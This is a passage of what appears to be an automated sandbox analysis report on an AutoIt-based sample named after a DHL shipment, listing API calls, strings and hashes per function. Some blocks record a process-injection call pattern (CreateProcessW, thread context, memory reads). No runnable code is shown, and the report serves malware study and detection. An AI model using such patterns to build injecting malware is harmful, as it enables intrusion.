                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                                                        • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                        • API String ID: 4212290369-3242690629
                                                                                        • Opcode ID: 241fea539447753766cd4ee01b33ddbd46e6cf1c007a25da8bf8244cb4d42eb3
                                                                                        • Instruction ID: 37b17b91e82fcd3f443228028e6e799a337050e74606f18efeab8f1a53940101
                                                                                        • Opcode Fuzzy Hash: 241fea539447753766cd4ee01b33ddbd46e6cf1c007a25da8bf8244cb4d42eb3
                                                                                        • Instruction Fuzzy Hash: 05B2A370608741DFD724DF24C885BAEB7E4BF85304F24491DF499972A2CBB1E985EB82

Control-flow Graph

APIs
  • Part of subcall function 00C68F5F: __time64.LIBCMT ref: 00C68F69
  • Part of subcall function 00C04EE5: _fseek.LIBCMT ref: 00C04EFD
• __wsplitpath.LIBCMT ref: 00C69234
  • Part of subcall function 00C240FB: __wsplitpath_helper.LIBCMT ref: 00C2413B
• _wcscpy.LIBCMT ref: 00C69247
• _wcscat.LIBCMT ref: 00C6925A
• __wsplitpath.LIBCMT ref: 00C6927F
• _wcscat.LIBCMT ref: 00C69295
• _wcscat.LIBCMT ref: 00C692A8
  • Part of subcall function 00C68FA5: _memmove.LIBCMT ref: 00C68FDE
  • Part of subcall function 00C68FA5: _memmove.LIBCMT ref: 00C68FED
• _wcscmp.LIBCMT ref: 00C691EF
  • Part of subcall function 00C69734: _wcscmp.LIBCMT ref: 00C69824
  • Part of subcall function 00C69734: _wcscmp.LIBCMT ref: 00C69837
• DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00C69452
• _wcsncpy.LIBCMT ref: 00C694C5
• DeleteFileW.KERNEL32(?,?), ref: 00C694FB
• CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00C69511
• DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C69522
• DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C69534
Memory Dump Source
• Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
Similarity
• API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
• String ID:
• API String ID: 1500180987-0
• Opcode ID: 5bf8b14083bbe9ee8e78da738e651bcc785cb40310fffe8b706b8987e181b5de
• Instruction ID: 3cfc44c456f6ad3a7cb346c756eff00fe0e7649cc07e892703c5163a7f22a37a
• Opcode Fuzzy Hash: 5bf8b14083bbe9ee8e78da738e651bcc785cb40310fffe8b706b8987e181b5de
• Instruction Fuzzy Hash: 8CC139B1D00229ABDF25DFA5CC81ADEB7BCEF45310F0040AAF609E6151EB309A85DF65

Control-flow Graph

APIs
• GetSysColorBrush.USER32(0000000F), ref: 00C03074
• RegisterClassExW.USER32(00000030), ref: 00C0309E
• RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C030AF
• InitCommonControlsEx.COMCTL32(?), ref: 00C030CC
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C030DC
• LoadIconW.USER32(000000A9), ref: 00C030F2
• ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C03101
Strings
Memory Dump Source
• Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
Similarity
• API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
• String ID: +$0$AutoIt v3 GUI$TaskbarCreated
• API String ID: 2914291525-1005189915
• Opcode ID: 624df892c733336f4b1425966a66ccb3039578f5aa8becf88186135a3781cb33
• Instruction ID: d3b12fd07584f12f36ae73de6b9518a83b4c5885749a6ba021f3605a573174c2
• Opcode Fuzzy Hash: 624df892c733336f4b1425966a66ccb3039578f5aa8becf88186135a3781cb33
• Instruction Fuzzy Hash: F93104B1841309AFEB409FA4E888BCDBBF4FB09324F10412EE580E62A0D7B55582CF95

Control-flow Graph

APIs
• GetSysColorBrush.USER32(0000000F), ref: 00C03074
• RegisterClassExW.USER32(00000030), ref: 00C0309E
• RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C030AF
• InitCommonControlsEx.COMCTL32(?), ref: 00C030CC
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C030DC
• LoadIconW.USER32(000000A9), ref: 00C030F2
• ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C03101
Strings
Memory Dump Source
• Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
Similarity
• API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
• String ID: +$0$AutoIt v3 GUI$TaskbarCreated
• API String ID: 2914291525-1005189915
• Opcode ID: fe53685160425dd66102b71ebc6995bdb394308f898f2ed93d9c315945fa2016
• Instruction ID: 15c16544e606832ddd4a3ad68e147a7ea5df5d943e956422086bf5fddb5e92f6
• Opcode Fuzzy Hash: fe53685160425dd66102b71ebc6995bdb394308f898f2ed93d9c315945fa2016
• Instruction Fuzzy Hash: 0921D3B1D51218AFEB00DFA4EC89BDDBBF4FB08714F10412AF911A62A0DBB15585CF99

Control-flow Graph

APIs
  • Part of subcall function 00C04706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00CC52F8,?,00C037AE,?), ref: 00C04724
  • Part of subcall function 00C2050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00C07165), ref: 00C2052D
• RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00C071A8
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00C3E8C8
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00C3E909
• RegCloseKey.ADVAPI32(?), ref: 00C3E947
• _wcscat.LIBCMT ref: 00C3E9A0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
Similarity
• API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
• String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
• API String ID: 2673923337-2727554177
• Opcode ID: 7f20c7e0226ca5797df29a3a49e589dd690e40825a016e03dabe115cd34a7492
• Instruction ID: a2740bc7a1383b175a842ae0bc3ced6386277da28c857c25ed54177a5ca8f669
• Opcode Fuzzy Hash: 7f20c7e0226ca5797df29a3a49e589dd690e40825a016e03dabe115cd34a7492
• Instruction Fuzzy Hash: DF716C71508311AEC704EF69E981FAFBBE8FF84350F40052EF445872A1EB71A949DB52

Control-flow Graph

APIs
• GetSysColorBrush.USER32(0000000F), ref: 00C03A50
• LoadCursorW.USER32(00000000,00007F00), ref: 00C03A5F
• LoadIconW.USER32(00000063), ref: 00C03A76
• LoadIconW.USER32(000000A4), ref: 00C03A88
• LoadIconW.USER32(000000A2), ref: 00C03A9A
• LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00C03AC0
• RegisterClassExW.USER32(?), ref: 00C03B16
  • Part of subcall function 00C03041: GetSysColorBrush.USER32(0000000F), ref: 00C03074
  • Part of subcall function 00C03041: RegisterClassExW.USER32(00000030), ref: 00C0309E
  • Part of subcall function 00C03041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C030AF
  • Part of subcall function 00C03041: InitCommonControlsEx.COMCTL32(?), ref: 00C030CC
  • Part of subcall function 00C03041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C030DC
  • Part of subcall function 00C03041: LoadIconW.USER32(000000A9), ref: 00C030F2
  • Part of subcall function 00C03041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C03101
Strings
Memory Dump Source
• Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
Similarity
• API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
• String ID: #$0$AutoIt v3
• API String ID: 423443420-4155596026
• Opcode ID: 6ef1dbd76ed86c3f32e83c44bb39472a419eb993cd2f788675d9daedd08d0f3f
• Instruction ID: 05e1983f5e77bbdd55c3145431c6f7cb2a2c450dfb7b65ed4737159664d5ac9a
• Opcode Fuzzy Hash: 6ef1dbd76ed86c3f32e83c44bb39472a419eb993cd2f788675d9daedd08d0f3f
• Instruction Fuzzy Hash: 902106B1D00708AFEB10DFA4EC49F9D7BF4EB08715F10012AE504AA2A1D7B56A90DF94

Control-flow Graph

                                                                                        APIs
                                                                                        • DefWindowProcW.USER32(?,?,?,?), ref: 00C036D2
                                                                                        • KillTimer.USER32(?,00000001), ref: 00C036FC
                                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00C0371F
                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C0372A
                                                                                        • CreatePopupMenu.USER32 ref: 00C0373E
                                                                                        • PostQuitMessage.USER32(00000000), ref: 00C0374D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                        • String ID: TaskbarCreated
                                                                                        • API String ID: 129472671-2362178303
                                                                                        • Opcode ID: b1efd7ffd7d74cd80fd97b326fd76fd503ec1507ad3cb60ff67a42fb01c8e044
                                                                                        • Instruction ID: 27a620ef53a994ce1e2a00e892d5e07c36be73962d1e855521530f9a72ed0b6c
                                                                                        • Opcode Fuzzy Hash: b1efd7ffd7d74cd80fd97b326fd76fd503ec1507ad3cb60ff67a42fb01c8e044
                                                                                        • Instruction Fuzzy Hash: F94145F2210589BBDB249F68ED09F7E379CFB44700F540129F612962E1CA62AF81E765

                                                                                        Control-flow Graph

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                                                        • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                                                        • API String ID: 1825951767-3513169116
                                                                                        • Opcode ID: 4bc08007abd534a11c636ef4c4e4fdd7650fc1fb3d3f3aca6666cd134a621dcc
                                                                                        • Instruction ID: c86b3014d0fbec0ccb0132c6e5a4adc7ea34b199b0fb7220c7f88235a284d948
                                                                                        • Opcode Fuzzy Hash: 4bc08007abd534a11c636ef4c4e4fdd7650fc1fb3d3f3aca6666cd134a621dcc
                                                                                        • Instruction Fuzzy Hash: B3A13BB291026D9ACF05EBA4DC91EEEB7B8FF14310F44052AF416A71D1EF746A09DB60

                                                                                         Control-flow Graph

                                                                                         [Graph image not preserved (executed / not-executed block colouring lost): function 013EC420-013EC722; blocks call CreateFileW, VirtualAlloc, ReadFile, VirtualAlloc, CloseHandle and VirtualFree, with internal calls to 013E9E40, 013ED330, 013ED580 and 013ED390; block 013EC63E loops back to the CreateFileW block at 013EC4D5]
                                                                                        APIs
                                                                                        • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 013EC4F1
                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 013EC717
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1397551629.00000000013E9000.00000040.00000020.00020000.00000000.sdmp, Offset: 013E9000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_13e9000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFileFreeVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 204039940-0
                                                                                        • Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                                                        • Instruction ID: 786ce08c12289be25e57765a64c4bfe486ab2b43bd58e68667c19bef268d3af7
                                                                                        • Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                                                        • Instruction Fuzzy Hash: 4AA10870E00219EBDB14CFA8C998BEEBBB5BF48318F249559E101BB2C1D775AA40CF54

                                                                                         Control-flow Graph

                                                                                         [Graph image not preserved (executed / not-executed block colouring lost): single basic block 00C039D5-00C03A45 calling CreateWindowExW twice and ShowWindow twice]
                                                                                        APIs
                                                                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00C03A03
                                                                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00C03A24
                                                                                        • ShowWindow.USER32(00000000,?,?), ref: 00C03A38
                                                                                        • ShowWindow.USER32(00000000,?,?), ref: 00C03A41
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$CreateShow
                                                                                        • String ID: AutoIt v3$edit
                                                                                        • API String ID: 1584632944-3779509399
                                                                                        • Opcode ID: 8dff46dad3f2edb304115c7f91b37aa40660c2707468aa25d701b85b65bc45e4
                                                                                        • Instruction ID: d4b45138fd26d8bdd38382316b98062c792898f2bf1c40af982d96920caa3843
                                                                                        • Opcode Fuzzy Hash: 8dff46dad3f2edb304115c7f91b37aa40660c2707468aa25d701b85b65bc45e4
                                                                                        • Instruction Fuzzy Hash: B0F03A745002907EEB305723EC48F6F3EBDD7C6F50B01002EF900A2170C6712882DAB4

                                                                                         Control-flow Graph

                                                                                         [Graph image not preserved (executed / not-executed block colouring lost): function 013EC1F0-013EC3D7; blocks call CreateFileW, VirtualAlloc, ReadFile and ExitProcess, with internal calls to 013E9E40, 013EC0E0, 013EC120, 013EB0E0 and 013EC170]
                                                                                        APIs
                                                                                          • Part of subcall function 013EC0E0: Sleep.KERNELBASE(000001F4), ref: 013EC0F1
                                                                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 013EC311
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1397551629.00000000013E9000.00000040.00000020.00020000.00000000.sdmp, Offset: 013E9000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_13e9000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFileSleep
                                                                                        • String ID: 66Q120YBDKN90XBW
                                                                                        • API String ID: 2694422964-1927633842
                                                                                        • Opcode ID: 9c91fe1dceb630b1a35e09a51a46940776e426b006553d3a1eecbb5761d5dcea
                                                                                        • Instruction ID: 1fff76e7ed779731e4f0d3b26fd82b15c5fe643c2db5e022beab9bbba244459b
                                                                                        • Opcode Fuzzy Hash: 9c91fe1dceb630b1a35e09a51a46940776e426b006553d3a1eecbb5761d5dcea
                                                                                        • Instruction Fuzzy Hash: 40518330D14359DAEF11DBA4C818BEEBBB9AF15304F004199E218BB2C0D7B95B45CB65

                                                                                         Control-flow Graph

                                                                                         [Graph image not preserved (executed / not-executed block colouring lost): function 00C0407C-00C0417D with out-of-line blocks 00C3D3C8-00C3D41E; blocks call LoadStringW and Shell_NotifyIconW, with internal calls to 00C07A16, 00C07BCC, 00C07B2E, 00C06FE3, 00C22DE0, 00C0454E, 00C22DBC, 00C05904, 00C07CAB and 00C08047]
                                                                                        APIs
                                                                                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00C3D3D7
                                                                                          • Part of subcall function 00C07BCC: _memmove.LIBCMT ref: 00C07C06
                                                                                        • _memset.LIBCMT ref: 00C040FC
                                                                                        • _wcscpy.LIBCMT ref: 00C04150
                                                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00C04160
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                                        • String ID: Line:
                                                                                        • API String ID: 3942752672-1585850449
                                                                                        • Opcode ID: acdf2c0c49ff80a9e061f706b376152c78f0471a7f187dc3c9e51b8a2cf3be7c
                                                                                        • Instruction ID: 265607014ada13831774800bb9654336a93204d343768db0206e375fe332444d
                                                                                        • Opcode Fuzzy Hash: acdf2c0c49ff80a9e061f706b376152c78f0471a7f187dc3c9e51b8a2cf3be7c
                                                                                        • Instruction Fuzzy Hash: E231B3B1408705AFD725EB60EC46FDF77E8AF44304F10461EF685920E1DB70A689DB96

                                                                                         Control-flow Graph

                                                                                         [Graph image not preserved (executed / not-executed block colouring lost): function 00C0686A-00C068D9 with out-of-line blocks 00C3E031-00C3E2B8; no Windows API sits directly in a graph node, only internal calls such as 00C04DDD, 00C04E4A, 00C06A8C and 00C6955B]
                                                                                        APIs
                                                                                          • Part of subcall function 00C04DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00CC52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00C04E0F
                                                                                        • _free.LIBCMT ref: 00C3E263
                                                                                        • _free.LIBCMT ref: 00C3E2AA
                                                                                          • Part of subcall function 00C06A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00C06BAD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$CurrentDirectoryLibraryLoad
                                                                                        • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                        • API String ID: 2861923089-1757145024
                                                                                        • Opcode ID: bbef0b2dd34c978315f322f7d3e61be63b6c26a26c14f889275198335cc72d44
                                                                                        • Instruction ID: 12acbac19e49efa24ad06f3c9d0c71bb67da97b7bc3b77cb0475af3828d9eda7
                                                                                        • Opcode Fuzzy Hash: bbef0b2dd34c978315f322f7d3e61be63b6c26a26c14f889275198335cc72d44
                                                                                        • Instruction Fuzzy Hash: A7916E71910219AFCF18EFA4CC919EEB7B8FF04314F10452AF815AB2E1DB71AA55DB50
                                                                                        APIs
                                                                                        • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00C035A1,SwapMouseButtons,00000004,?), ref: 00C035D4
                                                                                        • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00C035A1,SwapMouseButtons,00000004,?,?,?,?,00C02754), ref: 00C035F5
                                                                                        • RegCloseKey.KERNELBASE(00000000,?,?,00C035A1,SwapMouseButtons,00000004,?,?,?,?,00C02754), ref: 00C03617
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseOpenQueryValue
                                                                                        • String ID: Control Panel\Mouse
                                                                                        • API String ID: 3677997916-824357125
                                                                                        • Opcode ID: 7317863b5259114fe2e2d795f87acca2b537ae9113d24de7d569650bf70bedfc
                                                                                        • Instruction ID: fc4272d7a44159f3fe8771cbdb4af1ff9c96a29236e0da82a298b63e2cb949f4
                                                                                        • Opcode Fuzzy Hash: 7317863b5259114fe2e2d795f87acca2b537ae9113d24de7d569650bf70bedfc
                                                                                        • Instruction Fuzzy Hash: AF113371610648BEDB208F65D880AEEBBBCEF04740F108469B905D7250E6729F41EBA8
                                                                                        APIs
                                                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 013EB89B
                                                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 013EB931
                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 013EB953
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1397551629.00000000013E9000.00000040.00000020.00020000.00000000.sdmp, Offset: 013E9000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_13e9000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                        • String ID:
                                                                                        • API String ID: 2438371351-0
                                                                                        • Opcode ID: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                                                                                        • Instruction ID: f784cb96e99f643370d885a0c4a1d4d1a82da7c9e95c9744c28cf6285f374916
                                                                                        • Opcode Fuzzy Hash: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                                                                                        • Instruction Fuzzy Hash: DA620A30A14268DBEB24CBA4C844BDEB776EF58304F1091A9D20DEB3D4E7759E81CB59
                                                                                        APIs
                                                                                          • Part of subcall function 00C04EE5: _fseek.LIBCMT ref: 00C04EFD
                                                                                          • Part of subcall function 00C69734: _wcscmp.LIBCMT ref: 00C69824
                                                                                          • Part of subcall function 00C69734: _wcscmp.LIBCMT ref: 00C69837
                                                                                        • _free.LIBCMT ref: 00C696A2
                                                                                        • _free.LIBCMT ref: 00C696A9
                                                                                        • _free.LIBCMT ref: 00C69714
